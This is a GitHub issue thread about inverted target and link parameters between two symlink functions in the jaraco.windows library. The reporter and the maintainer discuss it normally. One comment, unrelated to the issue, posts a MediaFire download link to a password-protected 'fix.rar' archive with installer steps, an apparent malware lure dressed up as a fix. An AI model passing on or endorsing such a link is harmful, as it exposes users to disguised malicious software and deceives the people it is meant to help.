### ISSUE TITLE
`symlink` fallback in `jaraco/windows/bugs/vista-symlink-islink-bug.py` has inverted `target` and `link` param compared to `jaraco.windows.filesystem.symlink`

### ISSUE THREAD

**Issue by Avasam** [jaraco/jaraco.windows#27]
`jaraco.windows.filesystem.symlink`:
```py
def symlink(target, link, target_is_directory=False): ...
```

`jaraco.windows.bugs.vista-symlink-islink-bug.symlink`:
```py
def symlink(link, target, target_is_directory=False): ...
```

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jaraco** [comment]
The stuff in `.bugs` is ignorable, I think. Those modules were migrated from a non-project directory and they were used to keep track of bugs I was following. They're mostly cruft at this point. Still, makes sense to clean them up.
